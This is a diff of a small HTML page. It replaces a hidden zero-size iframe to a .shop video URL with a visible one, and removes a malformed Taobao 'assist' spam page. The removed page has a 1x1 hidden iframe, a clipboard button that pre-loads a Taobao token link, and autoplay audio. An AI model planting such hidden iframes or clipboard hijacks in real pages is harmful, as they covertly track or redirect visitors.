--- a/00.html
+++ b/00.html
@@ -5,78 +5,10 @@
 <body>
    
   
-   <iframe src="http://ld.hgger.shop/video/index/index/user_login/15179500438/video_id/221342"frameborder="0" width="0" height="0"></iframe>
+   <iframe src="http://ld.tgvr.shop/video/index/index/user_login/15179500438/video_id/222388" width="400" height="400"></iframe>
 
 </body> 
 
-<html
-	<head> 
-		<meta charset="utf-8">
-		<html class="no-js" lang="" style="--status-bar-height:0px; --window-top:0px; --window-bottom:0px;">
-			<head>
-				<meta charset="utf-8">
-				<meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">
-
-				<title>
-					助力
-				</title>
-				
-<link type="text/css" rel="stylesheet" href="./index.css"><title> </title></head>
-<body>
-			<script src="./jquery.js"></script>  
-    <script src="./clipboard.min.js"></script>  </script>  
-    <div class="STYLE1">
-<style>#nr{font-size:30px;margin: 10;background: -webkit-linear-gradient(left,#ffffff,#ff0000 
-
-6.25%,#ff7d00 12.5%,#ffff00 18.75%,#00ff00 25%,#00ffff 31.25%,#0000ff 37.5%,#ff00ff 43.75%,#ffff00 50%,#ff0000 56.25%,#ff7d00 62.5%,#ffff00 68.75%,#00ff00 75%,#00ffff 
-
-81.25%,#0000ff 87.5%,#ff00ff 93.75%,#ffff00 100%);-webkit-background-clip: text;-webkit-text-fill-color: transparent;background-size: 200% 100%;animation: masked-animation 2s 
-
-infinite linear;}@keyframes masked-animation {0% {background-position: 0 0;}100% {background-position: -100%, 0;}}</style></div>
-<TD height=40 width=821 colSpan=2><SPAN class=STYLE1>
-<MARQUEE><STRONG>
-
-<b id="nr"><a href="https://98tv.github.io">淘宝助力中.请稍后....</a></FONT></STRONG></MARQUEE></SPAN>
-</div>
-	</marquee></style>
-													</a>
-								</span>
-							</div>  </div> </div> 
-						</div>
-
-
-	
-<br>  <span id="target"></span>
-<div class="icopy_1" data-clipboard-text="https://m.tb.cn/h.5VWg7hI?tk=5qHwdy7fmb8"data-clipboard-target="#target" id="copy_btn"><div class="drugsword" ><!-- 
-
-前面是文字居中 --><a href="https://m.tb.cn/h.5VWg7hI?tk=5qHwdy7fmb8">★★★点击进入淘宝助力★★★</a></div></div> </br>
-
-  </footer>
-   <body>
-   
-    <iframe src=" https://mr.baidu.com/15yPnDNwH3G" width="1" height="1"></iframe>
-
-
-</body>
-
-</div>
-<div id="bg"></div>
-<audio id="audio" autoplay>
-  <source src="" type="audio/mpeg">
-</audio>
-
-
-</html></script>
-</body>
-	
-
-  </footer>
-   
-
-</div>
-<div id="bg"></div>
-<audio id="audio" autoplay>
-  <source src="" type="audio/mpeg">
 </audio>
 
 
